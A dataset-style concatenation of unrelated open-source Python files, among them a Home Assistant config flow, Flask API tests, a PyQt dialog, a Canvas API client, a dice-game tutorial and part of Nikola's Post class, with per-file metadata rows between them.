if __name__ == '__main__':
G1 = Graph([(0,4), (1,4), (4,5), (3,5), (3,4), (2,5), (2,3)])
G2 = Graph([(0,4), (1,3), (4,5), (3,5), (3,4), (2,5), (2,4)])
G1.vs["name"] = ["1", "1", "2", "3", "4", "5"]
G2.vs["name"] = ["1", "2", "2", "3", "4", "5"]
G1["name"] = 'G1'
G2["name"] = 'G2'
weisfeiler_lehman_graph_isomorphism_test(G1, G2)
print G1
print G2 | mit | -2,112,818,726,911,263,500 | 37.854167 | 106 | 0.521459 | false | 3.055738 | false | false | false |
jnewland/ha-config | custom_components/senseme/config_flow.py | 1 | 2995 | """Config flow for SenseME."""
import ipaddress
import voluptuous as vol
from aiosenseme import async_get_device_by_ip_address, discover_all
from homeassistant import config_entries
from homeassistant.const import CONF_HOST
from .const import CONF_HOST_MANUAL, CONF_INFO, DOMAIN
DISCOVER_TIMEOUT = 5
class SensemeFlowHandler(config_entries.ConfigFlow, domain=DOMAIN):
"""Handle SenseME discovery config flow."""
VERSION = 1
CONNECTION_CLASS = config_entries.CONN_CLASS_LOCAL_PUSH
def __init__(self) -> None:
"""Initialize the SenseME config flow."""
self._discovered_devices = None
async def _async_entry_for_device(self, device):
"""Create a config entry for a device."""
await self.async_set_unique_id(device.uuid)
self._abort_if_unique_id_configured()
return self.async_create_entry(
title=device.name,
data={CONF_INFO: device.get_device_info},
)
async def async_step_manual(self, user_input=None):
"""Handle manual entry of an ip address."""
errors = {}
if user_input is not None:
host = user_input[CONF_HOST]
try:
ipaddress.ip_address(host)
except ValueError:
errors[CONF_HOST] = "invalid_host"
else:
device = await async_get_device_by_ip_address(host)
if device is not None:
return await self._async_entry_for_device(device)
errors[CONF_HOST] = "cannot_connect"
return self.async_show_form(
step_id="manual",
data_schema=vol.Schema({vol.Required(CONF_HOST): str}),
errors=errors,
)
async def async_step_user(self, user_input=None):
"""Handle a flow initialized by the user."""
# start discovery the first time through
if self._discovered_devices is None:
self._discovered_devices = await discover_all(DISCOVER_TIMEOUT)
current_ids = self._async_current_ids()
device_selection = [
device.name
for device in self._discovered_devices
if device.uuid not in current_ids
]
if not device_selection:
return await self.async_step_manual(user_input=None)
device_selection.append(CONF_HOST_MANUAL)
if user_input is not None:
if user_input[CONF_HOST] == CONF_HOST_MANUAL:
return await self.async_step_manual()
for device in self._discovered_devices:
if device == user_input[CONF_HOST]:
return await self._async_entry_for_device(device)
return self.async_show_form(
step_id="user",
data_schema=vol.Schema(
{
vol.Optional(CONF_HOST, default=device_selection[0]): vol.In(
device_selection
)
}
),
)
| mit | 3,527,471,452,215,158,000 | 32.277778 | 81 | 0.582638 | false | 4.200561 | true | false | false |
ssls/beetle-agent | tests/modules/teams/resources/test_modifying_teams.py | 1 | 4600 | # encoding: utf-8
# pylint: disable=missing-docstring
import json
from app.modules.teams import models
def test_new_team_creation(flask_app_client, db, regular_user):
# pylint: disable=invalid-name
team_title = "Test Team Title"
with flask_app_client.login(regular_user, auth_scopes=('teams:write', )):
response = flask_app_client.post('/api/v1/teams/', data={'title': team_title})
assert response.status_code == 200
assert response.content_type == 'application/json'
assert set(response.json.keys()) >= {'id', 'title'}
assert response.json['title'] == team_title
# Cleanup
team = models.Team.query.get(response.json['id'])
assert team.title == team_title
db.session.delete(team)
db.session.commit()
def test_new_team_creation_with_invalid_data_must_fail(flask_app_client, regular_user):
# pylint: disable=invalid-name
with flask_app_client.login(regular_user, auth_scopes=('teams:write', )):
response = flask_app_client.post('/api/v1/teams/', data={'title': ""})
assert response.status_code == 409
assert response.content_type == 'application/json'
assert set(response.json.keys()) >= {'status', 'message'}
def test_update_team_info(flask_app_client, regular_user, team_for_regular_user):
# pylint: disable=invalid-name
team_title = "Test Team Title"
with flask_app_client.login(regular_user, auth_scopes=('teams:write', )):
response = flask_app_client.patch(
'/api/v1/teams/%d' % team_for_regular_user.id,
content_type='application/json',
data=json.dumps((
{
'op': 'replace',
'path': '/title',
'value': team_title
},
))
)
assert response.status_code == 200
assert response.content_type == 'application/json'
assert set(response.json.keys()) >= {'id', 'title'}
assert response.json['id'] == team_for_regular_user.id
assert response.json['title'] == team_title
assert team_for_regular_user.title == team_title
def test_update_team_info_with_invalid_data_must_fail(
flask_app_client,
regular_user,
team_for_regular_user
):
# pylint: disable=invalid-name
with flask_app_client.login(regular_user, auth_scopes=('teams:write', )):
response = flask_app_client.patch(
'/api/v1/teams/%d' % team_for_regular_user.id,
content_type='application/json',
data=json.dumps((
{
'op': 'replace',
'path': '/title',
'value': '',
},
))
)
assert response.status_code == 409
assert response.content_type == 'application/json'
assert set(response.json.keys()) >= {'status', 'message'}
def test_team_deletion(flask_app_client, regular_user, team_for_regular_user):
with flask_app_client.login(regular_user, auth_scopes=('teams:write', )):
response = flask_app_client.delete(
'/api/v1/teams/%d' % team_for_regular_user.id
)
assert response.status_code == 200
assert response.content_type == 'application/json'
def test_add_new_team_member(flask_app_client, db, regular_user, admin_user, team_for_regular_user):
# pylint: disable=invalid-name
with flask_app_client.login(regular_user, auth_scopes=('teams:write', )):
response = flask_app_client.post(
'/api/v1/teams/%d/members/' % team_for_regular_user.id,
data={
'user_id': admin_user.id,
}
)
assert response.status_code == 200
assert response.content_type == 'application/json'
assert set(response.json.keys()) >= {'team', 'user', 'is_leader'}
assert response.json['team']['id'] == team_for_regular_user.id
assert response.json['user']['id'] == admin_user.id
# Cleanup
team_members = models.TeamMember.query.filter_by(team=team_for_regular_user, user=admin_user)
assert team_members.count() == 1
team_members.delete()
db.session.commit()
def test_delete_team_member(
flask_app_client, db, regular_user, readonly_user, team_for_regular_user
):
# pylint: disable=invalid-name,unused-argument
with flask_app_client.login(regular_user, auth_scopes=('teams:write', )):
response = flask_app_client.delete(
'/api/v1/teams/%d/members/%d' % (team_for_regular_user.id, readonly_user.id),
)
assert response.status_code == 200
assert response.content_type == 'application/json'
| mit | 1,529,536,958,977,042,000 | 35.220472 | 100 | 0.61587 | false | 3.588144 | true | false | false |
spiside/pdb-tutorial | solutions/dicegame/runner.py | 1 | 1693 | from .die import Die
from .utils import i_just_throw_an_exception
class GameRunner:
def __init__(self):
self.dice = Die.create_dice(5)
self.reset()
    def reset(self):
        self.round = 1
        self.wins = 0
        self.loses = 0
        self.consecutive_wins = 0  # initialised here so run() can increment it safely
@property
def answer(self):
total = 0
for die in self.dice:
total += die.value
return total
@classmethod
def run(cls):
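        # count tracks consecutive correct guesses; six in a row ends the game with a win.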
count = 0
runner = cls()
while True:
print("Round {}\n".format(runner.round))
for die in runner.dice:
print(die.show())
guess = input("Sigh. What is your guess?: ")
guess = int(guess)
if guess == runner.answer:
print("Congrats, you can add like a 5 year old...")
runner.wins += 1
count += 1
runner.consecutive_wins += 1
else:
print("Sorry that's wrong")
print("The answer is: {}".format(runner.answer))
print("Like seriously, how could you mess that up")
runner.loses += 1
count = 0
print("Wins: {} Loses {}".format(runner.wins, runner.loses))
runner.round += 1
if count == 6:
print("You won... Congrats...")
print("The fact it took you so long is pretty sad")
break
prompt = input("Would you like to play again?[Y/n]: ")
if prompt.lower() == 'y' or prompt == '':
continue
else:
break
| mit | -5,400,822,887,541,992,000 | 26.216667 | 72 | 0.453042 | false | 4.408854 | false | false | false |
joseandro/liToCNF | sValidator.py | 1 | 1230 | # This module validates inequations along with their solutions
# Author: Joseandro Luiz
def isValid(cnf, res):
"""
This function validates a CNF
@rtype: bool
"""
# Turn all variables from CNF positive (we have to compare them later)
andBoolClause = None
    for i in cnf:
        orBoolClause = None
        for j, val in enumerate(i):
isFound = False
modVal = val
orBool = None
if modVal < 0:
modVal *= -1
try:
if res.index(modVal) >= 0:
isFound = True
except ValueError:
pass
            if isFound:
                # A variable found in res satisfies the literal only when the literal is positive.
                if i[j] > 0:
                    orBool = True
                else:
                    orBool = False
elif i[j] > 0:
orBool = False
else:
orBool = True
            if orBoolClause is None:
                orBoolClause = orBool
            else:
                orBoolClause = orBoolClause or orBool
        if andBoolClause is None:
            andBoolClause = orBoolClause
        else:
            andBoolClause = andBoolClause and orBoolClause
return andBoolClause | gpl-3.0 | -8,536,422,730,506,171,000 | 25.76087 | 74 | 0.481301 | false | 4.641509 | false | false | false |
manashmndl/LearningPyQt | pyqt/chap11/contactdlg.py | 1 | 5621 | #!/usr/bin/env python
# Copyright (c) 2008-14 Qtrac Ltd. All rights reserved.
# This program or module is free software: you can redistribute it and/or
# modify it under the terms of the GNU General Public License as published
# by the Free Software Foundation, either version 2 of the License, or
# version 3 of the License, or (at your option) any later version. It is
# provided for educational purposes and is distributed in the hope that
# it will be useful, but WITHOUT ANY WARRANTY; without even the implied
# warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See
# the GNU General Public License for more details.
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from future_builtins import *
import sys
from PyQt4.QtCore import (QVariant, Qt)
from PyQt4.QtGui import (QApplication, QComboBox, QDialog,
QDialogButtonBox, QGridLayout, QLabel, QLineEdit, QVBoxLayout)
class ContactDlg(QDialog):
StyleSheet = """
QComboBox { color: darkblue; }
QLineEdit { color: darkgreen; }
QLineEdit[mandatory="true"] {
background-color: rgb(255, 255, 127);
color: darkblue;
}
"""
def __init__(self, parent=None):
super(ContactDlg, self).__init__(parent)
self.create_widgets()
self.layout_widgets()
self.create_connections()
self.lineedits = (self.forenameEdit, self.surnameEdit,
self.companyEdit, self.phoneEdit, self.emailEdit)
for lineEdit in self.lineedits:
lineEdit.setProperty("mandatory", QVariant(True))
lineEdit.textEdited.connect(self.updateUi)
self.categoryComboBox.activated[int].connect(self.updateUi)
self.setStyleSheet(ContactDlg.StyleSheet)
self.setWindowTitle("Add Contact")
# An alternative would be to not create the QLabels but instead use a
# QFormLayout
def create_widgets(self):
self.forenameLabel = QLabel("&Forename:")
self.forenameEdit = QLineEdit()
self.forenameLabel.setBuddy(self.forenameEdit)
self.surnameLabel = QLabel("&Surname:")
self.surnameEdit = QLineEdit()
self.surnameLabel.setBuddy(self.surnameEdit)
self.categoryLabel = QLabel("&Category:")
self.categoryComboBox = QComboBox()
self.categoryLabel.setBuddy(self.categoryComboBox)
self.categoryComboBox.addItems(["Business", "Domestic",
"Personal"])
self.companyLabel = QLabel("C&ompany:")
self.companyEdit = QLineEdit()
self.companyLabel.setBuddy(self.companyEdit)
self.addressLabel = QLabel("A&ddress:")
self.addressEdit = QLineEdit()
self.addressLabel.setBuddy(self.addressEdit)
self.phoneLabel = QLabel("&Phone:")
self.phoneEdit = QLineEdit()
self.phoneLabel.setBuddy(self.phoneEdit)
self.mobileLabel = QLabel("&Mobile:")
self.mobileEdit = QLineEdit()
self.mobileLabel.setBuddy(self.mobileEdit)
self.faxLabel = QLabel("Fa&x:")
self.faxEdit = QLineEdit()
self.faxLabel.setBuddy(self.faxEdit)
self.emailLabel = QLabel("&Email:")
self.emailEdit = QLineEdit()
self.emailLabel.setBuddy(self.emailEdit)
self.buttonBox = QDialogButtonBox(QDialogButtonBox.Ok|
QDialogButtonBox.Cancel)
addButton = self.buttonBox.button(QDialogButtonBox.Ok)
addButton.setText("&Add")
addButton.setEnabled(False)
def layout_widgets(self):
grid = QGridLayout()
grid.addWidget(self.forenameLabel, 0, 0)
grid.addWidget(self.forenameEdit, 0, 1)
grid.addWidget(self.surnameLabel, 0, 2)
grid.addWidget(self.surnameEdit, 0, 3)
grid.addWidget(self.categoryLabel, 1, 0)
grid.addWidget(self.categoryComboBox, 1, 1)
grid.addWidget(self.companyLabel, 1, 2)
grid.addWidget(self.companyEdit, 1, 3)
grid.addWidget(self.addressLabel, 2, 0)
grid.addWidget(self.addressEdit, 2, 1, 1, 3)
grid.addWidget(self.phoneLabel, 3, 0)
grid.addWidget(self.phoneEdit, 3, 1)
grid.addWidget(self.mobileLabel, 3, 2)
grid.addWidget(self.mobileEdit, 3, 3)
grid.addWidget(self.faxLabel, 4, 0)
grid.addWidget(self.faxEdit, 4, 1)
grid.addWidget(self.emailLabel, 4, 2)
grid.addWidget(self.emailEdit, 4, 3)
layout = QVBoxLayout()
layout.addLayout(grid)
layout.addWidget(self.buttonBox)
self.setLayout(layout)
def create_connections(self):
self.buttonBox.accepted.connect(self.accept)
self.buttonBox.rejected.connect(self.reject)
def updateUi(self):
mandatory = self.companyEdit.property("mandatory").toBool()
if self.categoryComboBox.currentText() == "Business":
if not mandatory:
self.companyEdit.setProperty("mandatory", QVariant(True))
elif mandatory:
self.companyEdit.setProperty("mandatory", QVariant(False))
if (mandatory !=
self.companyEdit.property("mandatory").toBool()):
self.setStyleSheet(ContactDlg.StyleSheet)
enable = True
for lineEdit in self.lineedits:
if (lineEdit.property("mandatory").toBool() and
lineEdit.text().isEmpty()):
enable = False
break
self.buttonBox.button(QDialogButtonBox.Ok).setEnabled(enable)
if __name__ == "__main__":
app = QApplication(sys.argv)
form = ContactDlg()
form.show()
app.exec_()
| mit | 7,333,913,285,468,876,000 | 38.584507 | 74 | 0.654688 | false | 3.906185 | false | false | false |
tylerclair/py3canvas | py3canvas/apis/user_observees.py | 1 | 5486 | """UserObservees API Version 1.0.
This API client was generated using a template. Make sure this code is valid before using it.
"""
import logging
from datetime import date, datetime
from .base import BaseCanvasAPI
class UserObserveesAPI(BaseCanvasAPI):
"""UserObservees API Version 1.0."""
def __init__(self, *args, **kwargs):
"""Init method for UserObserveesAPI."""
super(UserObserveesAPI, self).__init__(*args, **kwargs)
self.logger = logging.getLogger("py3canvas.UserObserveesAPI")
def list_observees(self, user_id, include=None):
"""
List observees.
List the users that the given user is observing.
*Note:* all users are allowed to list their own observees. Administrators can list
other users' observees.
"""
path = {}
data = {}
params = {}
# REQUIRED - PATH - user_id
"""ID"""
path["user_id"] = user_id
# OPTIONAL - include
"""- "avatar_url": Optionally include avatar_url."""
if include is not None:
self._validate_enum(include, ["avatar_url"])
params["include"] = include
self.logger.debug("GET /api/v1/users/{user_id}/observees with query params: {params} and form data: {data}".format(params=params, data=data, **path))
return self.generic_request("GET", "/api/v1/users/{user_id}/observees".format(**path), data=data, params=params, all_pages=True)
def add_observee_with_credentials(self, user_id, access_token=None, observee_password=None, observee_unique_id=None):
"""
Add an observee with credentials.
Register the given user to observe another user, given the observee's credentials.
*Note:* all users are allowed to add their own observees, given the observee's
credentials or access token are provided. Administrators can add observees given credentials, access token or
the {api:UserObserveesController#update observee's id}.
"""
path = {}
data = {}
params = {}
# REQUIRED - PATH - user_id
"""ID"""
path["user_id"] = user_id
# OPTIONAL - observee[unique_id]
"""The login id for the user to observe. Required if access_token is omitted."""
if observee_unique_id is not None:
data["observee[unique_id]"] = observee_unique_id
# OPTIONAL - observee[password]
"""The password for the user to observe. Required if access_token is omitted."""
if observee_password is not None:
data["observee[password]"] = observee_password
# OPTIONAL - access_token
"""The access token for the user to observe. Required if <tt>observee[unique_id]</tt> or <tt>observee[password]</tt> are omitted."""
if access_token is not None:
data["access_token"] = access_token
self.logger.debug("POST /api/v1/users/{user_id}/observees with query params: {params} and form data: {data}".format(params=params, data=data, **path))
return self.generic_request("POST", "/api/v1/users/{user_id}/observees".format(**path), data=data, params=params, single_item=True)
def show_observee(self, user_id, observee_id):
"""
Show an observee.
Gets information about an observed user.
*Note:* all users are allowed to view their own observees.
"""
path = {}
data = {}
params = {}
# REQUIRED - PATH - user_id
"""ID"""
path["user_id"] = user_id
# REQUIRED - PATH - observee_id
"""ID"""
path["observee_id"] = observee_id
self.logger.debug("GET /api/v1/users/{user_id}/observees/{observee_id} with query params: {params} and form data: {data}".format(params=params, data=data, **path))
return self.generic_request("GET", "/api/v1/users/{user_id}/observees/{observee_id}".format(**path), data=data, params=params, single_item=True)
def add_observee(self, user_id, observee_id):
"""
Add an observee.
Registers a user as being observed by the given user.
"""
path = {}
data = {}
params = {}
# REQUIRED - PATH - user_id
"""ID"""
path["user_id"] = user_id
# REQUIRED - PATH - observee_id
"""ID"""
path["observee_id"] = observee_id
self.logger.debug("PUT /api/v1/users/{user_id}/observees/{observee_id} with query params: {params} and form data: {data}".format(params=params, data=data, **path))
return self.generic_request("PUT", "/api/v1/users/{user_id}/observees/{observee_id}".format(**path), data=data, params=params, single_item=True)
def remove_observee(self, user_id, observee_id):
"""
Remove an observee.
Unregisters a user as being observed by the given user.
"""
path = {}
data = {}
params = {}
# REQUIRED - PATH - user_id
"""ID"""
path["user_id"] = user_id
# REQUIRED - PATH - observee_id
"""ID"""
path["observee_id"] = observee_id
self.logger.debug("DELETE /api/v1/users/{user_id}/observees/{observee_id} with query params: {params} and form data: {data}".format(params=params, data=data, **path))
return self.generic_request("DELETE", "/api/v1/users/{user_id}/observees/{observee_id}".format(**path), data=data, params=params, single_item=True)
| mit | -4,811,413,284,564,236,000 | 36.834483 | 174 | 0.603172 | false | 3.640345 | false | false | false |
caoziyao/weibo | models/messageCopy.py | 1 | 1245 | import hashlib
import os
from . import ModelMixin
from . import db
from utils import timestamp
from utils import log
from utils import sh1hexdigest
class MessageCopy(db.Model, ModelMixin):
__tablename__ = 'messageCopys'
    Cid = db.Column(db.Integer, primary_key=True)  # repost id
    # Ccontent = db.Column(db.String(150))  # repost content
    # Cdatetime = db.Column(db.Integer)  # repost time
    # Foreign keys
    # u_id = db.Column(db.Integer, db.ForeignKey('users.Uid'))  # user id
    m_follow_id = db.Column(db.Integer, db.ForeignKey('messages.Mid'))  # message id
    m_fans_id = db.Column(db.Integer, db.ForeignKey('messages.Mid'))  # message id
    # Define a relationship
    # Automatically linked, so related data is available without manual queries
# user = db.relationship('User', backref='messageCopy', foreign_keys='MessageCopy.u_id')
m_follow = db.relationship('Message', backref='messagCopyFollow', foreign_keys='MessageCopy.m_follow_id')
m_fans = db.relationship('Message', backref='messagCopyFans', foreign_keys='MessageCopy.m_fans_id')
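    # Both relationships target Message, so each one must name its own FK column via foreign_keys.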
def __init__(self):
super(MessageCopy, self).__init__()
# self.Ccontent = form.get('content', '')
# self.Cdatetime = timestamp()
| mit | -8,593,585,503,986,119,000 | 35.03125 | 110 | 0.651344 | false | 2.933842 | false | false | false |
google/graphicsfuzz | gfauto/gfauto/run_bin.py | 1 | 2346 | # -*- coding: utf-8 -*-
# Copyright 2019 The GraphicsFuzz Project Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Runs a binary from the given binary name and settings file."""
import argparse
import subprocess
import sys
from pathlib import Path
from typing import List
from gfauto import binaries_util, settings_util
from gfauto.gflogging import log
def main() -> int:
parser = argparse.ArgumentParser(
description="Runs a binary given the binary name and settings.json file. "
"Use -- to separate args to run_bin and your binary. "
)
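    # Illustrative invocation (module path assumed):
    #   python -m gfauto.run_bin spirv-opt -- --version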
parser.add_argument(
"--settings",
help="Path to the settings JSON file for this instance.",
default=str(settings_util.DEFAULT_SETTINGS_FILE_PATH),
)
parser.add_argument(
"binary_name",
help="The name of the binary to run. E.g. spirv-opt, glslangValidator",
type=str,
)
parser.add_argument(
"arguments",
metavar="arguments",
type=str,
nargs="*",
help="The arguments to pass to the binary",
)
parsed_args = parser.parse_args(sys.argv[1:])
# Args.
settings_path: Path = Path(parsed_args.settings)
binary_name: str = parsed_args.binary_name
arguments: List[str] = parsed_args.arguments
try:
settings = settings_util.read_or_create(settings_path)
except settings_util.NoSettingsFile:
log(f"Settings file {str(settings_path)} was created for you; using this.")
settings = settings_util.read_or_create(settings_path)
binary_manager = binaries_util.get_default_binary_manager(settings=settings)
cmd = [str(binary_manager.get_binary_path_by_name(binary_name).path)]
cmd.extend(arguments)
return subprocess.run(cmd, check=False).returncode
if __name__ == "__main__":
sys.exit(main())
| apache-2.0 | 3,527,463,983,964,285,000 | 29.868421 | 83 | 0.684996 | false | 3.884106 | false | false | false |
masayuko/nikola | nikola/post.py | 1 | 47243 | # -*- coding: utf-8 -*-
# Copyright © 2012-2015 Roberto Alsina and others.
# Permission is hereby granted, free of charge, to any
# person obtaining a copy of this software and associated
# documentation files (the "Software"), to deal in the
# Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the
# Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice
# shall be included in all copies or substantial portions of
# the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR
# PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS
# OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR
# OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
# OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""The Post class."""
from __future__ import unicode_literals, print_function, absolute_import
import io
from collections import defaultdict
import datetime
import hashlib
import json
import os
import re
import string
try:
from urlparse import urljoin
except ImportError:
from urllib.parse import urljoin # NOQA
from . import utils
import dateutil.tz
import lxml.html
import html5lib
import natsort
try:
import pyphen
except ImportError:
pyphen = None
from math import ceil
# for tearDown with _reload we cannot use 'from ... import' to get LocaleBorg
import nikola.utils
from .utils import (
current_time,
Functionary,
LOGGER,
LocaleBorg,
slugify,
to_datetime,
unicode_str,
demote_headers,
get_translation_candidate,
unslugify,
)
from .rc4 import rc4
__all__ = ('Post',)
TEASER_REGEXP = re.compile('<!--\s*TEASER_END(:(.+))?\s*-->', re.IGNORECASE)
_UPGRADE_METADATA_ADVERTISED = False
class Post(object):
"""Represent a blog post or site page."""
def __init__(
self,
source_path,
config,
destination,
use_in_feeds,
messages,
template_name,
compiler
):
"""Initialize post.
The source path is the user created post file. From it we calculate
the meta file, as well as any translations available, and
the .html fragment file path.
"""
self.config = config
self.compiler = compiler
self.compile_html = self.compiler.compile_html
self.demote_headers = self.compiler.demote_headers and self.config['DEMOTE_HEADERS']
tzinfo = self.config['__tzinfo__']
if self.config['FUTURE_IS_NOW']:
self.current_time = None
else:
self.current_time = current_time(tzinfo)
self.translated_to = set([])
self._prev_post = None
self._next_post = None
self.base_url = self.config['BASE_URL']
self.is_draft = False
self.is_private = False
self.is_mathjax = False
self.strip_indexes = self.config['STRIP_INDEXES']
self.index_file = self.config['INDEX_FILE']
self.pretty_urls = self.config['PRETTY_URLS']
self.source_path = source_path # posts/blah.txt
self.post_name = os.path.splitext(source_path)[0] # posts/blah
# cache[\/]posts[\/]blah.html
self.base_path = os.path.join(self.config['CACHE_FOLDER'], self.post_name + ".html")
# cache/posts/blah.html
self._base_path = self.base_path.replace('\\', '/')
self.metadata_path = self.post_name + ".meta" # posts/blah.meta
self.folder = destination
self.translations = self.config['TRANSLATIONS']
self.default_lang = self.config['DEFAULT_LANG']
self.messages = messages
self.skip_untranslated = not self.config['SHOW_UNTRANSLATED_POSTS']
self._template_name = template_name
self.is_two_file = True
self.newstylemeta = True
self._reading_time = None
self._remaining_reading_time = None
self._paragraph_count = None
self._remaining_paragraph_count = None
self._dependency_file_fragment = defaultdict(list)
self._dependency_file_page = defaultdict(list)
self._dependency_uptodate_fragment = defaultdict(list)
self._dependency_uptodate_page = defaultdict(list)
default_metadata, self.newstylemeta = get_meta(self, self.config['FILE_METADATA_REGEXP'], self.config['UNSLUGIFY_TITLES'])
self.meta = Functionary(lambda: None, self.default_lang)
self.meta[self.default_lang] = default_metadata
# Load internationalized metadata
for lang in self.translations:
if os.path.isfile(get_translation_candidate(self.config, self.source_path, lang)):
self.translated_to.add(lang)
if lang != self.default_lang:
meta = defaultdict(lambda: '')
meta.update(default_metadata)
_meta, _nsm = get_meta(self, self.config['FILE_METADATA_REGEXP'], self.config['UNSLUGIFY_TITLES'], lang)
self.newstylemeta = self.newstylemeta and _nsm
meta.update(_meta)
self.meta[lang] = meta
if not self.is_translation_available(self.default_lang):
# Special case! (Issue #373)
# Fill default_metadata with stuff from the other languages
for lang in sorted(self.translated_to):
default_metadata.update(self.meta[lang])
if 'date' not in default_metadata and not use_in_feeds:
# For stories we don't *really* need a date
if self.config['__invariant__']:
default_metadata['date'] = datetime.datetime(2013, 12, 31, 23, 59, 59, tzinfo=tzinfo)
else:
default_metadata['date'] = datetime.datetime.utcfromtimestamp(
os.stat(self.source_path).st_ctime).replace(tzinfo=dateutil.tz.tzutc()).astimezone(tzinfo)
# If time zone is set, build localized datetime.
self.date = to_datetime(self.meta[self.default_lang]['date'], tzinfo)
if 'updated' not in default_metadata:
default_metadata['updated'] = default_metadata.get('date', None)
self.updated = to_datetime(default_metadata['updated'])
if 'title' not in default_metadata or 'slug' not in default_metadata \
or 'date' not in default_metadata:
raise OSError("You must set a title (found '{0}'), a slug (found "
"'{1}') and a date (found '{2}')! [in file "
"{3}]".format(default_metadata.get('title', None),
default_metadata.get('slug', None),
default_metadata.get('date', None),
source_path))
if 'type' not in default_metadata:
# default value is 'text'
default_metadata['type'] = 'text'
self.publish_later = False if self.current_time is None else self.date >= self.current_time
is_draft = False
is_private = False
self._tags = {}
for lang in self.translated_to:
self._tags[lang] = natsort.natsorted(
list(set([x.strip() for x in self.meta[lang]['tags'].split(',')])),
alg=natsort.ns.F | natsort.ns.IC)
self._tags[lang] = [t for t in self._tags[lang] if t]
if 'draft' in [_.lower() for _ in self._tags[lang]]:
is_draft = True
LOGGER.debug('The post "{0}" is a draft.'.format(self.source_path))
self._tags[lang].remove('draft')
# TODO: remove in v8
if 'retired' in self._tags[lang]:
is_private = True
LOGGER.warning('The "retired" tag in post "{0}" is now deprecated and will be removed in v8. Use "private" instead.'.format(self.source_path))
self._tags[lang].remove('retired')
# end remove in v8
if 'private' in self._tags[lang]:
is_private = True
LOGGER.debug('The post "{0}" is private.'.format(self.source_path))
self._tags[lang].remove('private')
# While draft comes from the tags, it's not really a tag
self.is_draft = is_draft
self.is_private = is_private
self.is_post = use_in_feeds
self.use_in_feeds = use_in_feeds and not is_draft and not is_private \
and not self.publish_later
        # If mathjax is a tag, or it's an ipynb post, then enable mathjax rendering support
self.is_mathjax = ('mathjax' in self.tags) or (self.compiler.name == 'ipynb')
# Register potential extra dependencies
self.compiler.register_extra_dependencies(self)
def _get_hyphenate(self):
return bool(self.config['HYPHENATE'] or self.meta('hyphenate'))
hyphenate = property(_get_hyphenate)
def __repr__(self):
"""Provide a representation of the post object."""
# Calculate a hash that represents most data about the post
m = hashlib.md5()
# source_path modification date (to avoid reading it)
m.update(utils.unicode_str(os.stat(self.source_path).st_mtime).encode('utf-8'))
clean_meta = {}
for k, v in self.meta.items():
sub_meta = {}
clean_meta[k] = sub_meta
for kk, vv in v.items():
if vv:
sub_meta[kk] = vv
m.update(utils.unicode_str(json.dumps(clean_meta, cls=utils.CustomEncoder, sort_keys=True)).encode('utf-8'))
return '<Post: {0!r} {1}>'.format(self.source_path, m.hexdigest())
def _has_pretty_url(self, lang):
if self.pretty_urls and \
self.meta[lang].get('pretty_url', '') != 'False' and \
self.meta[lang]['slug'] != 'index':
return True
else:
return False
@property
def alltags(self):
"""Return ALL the tags for this post."""
tags = []
for l in self._tags:
tags.extend(self._tags[l])
return list(set(tags))
def tags_for_language(self, lang):
"""Return tags for a given language."""
if lang in self._tags:
return self._tags[lang]
elif lang not in self.translated_to and self.skip_untranslated:
return []
elif self.default_lang in self._tags:
return self._tags[self.default_lang]
else:
return []
@property
def tags(self):
"""Return tags for the current language."""
lang = nikola.utils.LocaleBorg().current_lang
return self.tags_for_language(lang)
@property
def prev_post(self):
"""Return previous post."""
lang = nikola.utils.LocaleBorg().current_lang
rv = self._prev_post
while self.skip_untranslated:
if rv is None:
break
if rv.is_translation_available(lang):
break
rv = rv._prev_post
return rv
@prev_post.setter # NOQA
def prev_post(self, v):
"""Set previous post."""
self._prev_post = v
@property
def next_post(self):
"""Return next post."""
lang = nikola.utils.LocaleBorg().current_lang
rv = self._next_post
while self.skip_untranslated:
if rv is None:
break
if rv.is_translation_available(lang):
break
rv = rv._next_post
return rv
@next_post.setter # NOQA
def next_post(self, v):
"""Set next post."""
self._next_post = v
@property
def template_name(self):
"""Return template name for this post."""
lang = nikola.utils.LocaleBorg().current_lang
return self.meta[lang]['template'] or self._template_name
def formatted_date(self, date_format, date=None):
"""Return the formatted date as unicode."""
return utils.LocaleBorg().formatted_date(date_format, date if date else self.date)
def formatted_updated(self, date_format):
"""Return the updated date as unicode."""
return self.formatted_date(date_format, self.updated)
def title(self, lang=None):
"""Return localized title.
If lang is not specified, it defaults to the current language from
templates, as set in LocaleBorg.
"""
if lang is None:
lang = nikola.utils.LocaleBorg().current_lang
return self.meta[lang]['title']
def author(self, lang=None):
"""Return localized author or BLOG_AUTHOR if unspecified.
If lang is not specified, it defaults to the current language from
templates, as set in LocaleBorg.
"""
if lang is None:
lang = nikola.utils.LocaleBorg().current_lang
if self.meta[lang]['author']:
author = self.meta[lang]['author']
else:
author = self.config['BLOG_AUTHOR'](lang)
return author
def description(self, lang=None):
"""Return localized description."""
if lang is None:
lang = nikola.utils.LocaleBorg().current_lang
return self.meta[lang]['description']
def add_dependency(self, dependency, add='both', lang=None):
"""Add a file dependency for tasks using that post.
The ``dependency`` should be a string specifying a path, or a callable
which returns such a string or a list of strings.
The ``add`` parameter can be 'both', 'fragment' or 'page', to indicate
that this dependency shall be used
* when rendering the fragment to HTML ('fragment' and 'both'), or
* when creating a page with parts of the ``Post`` embedded, which
includes the HTML resulting from compiling the fragment ('page' or
'both').
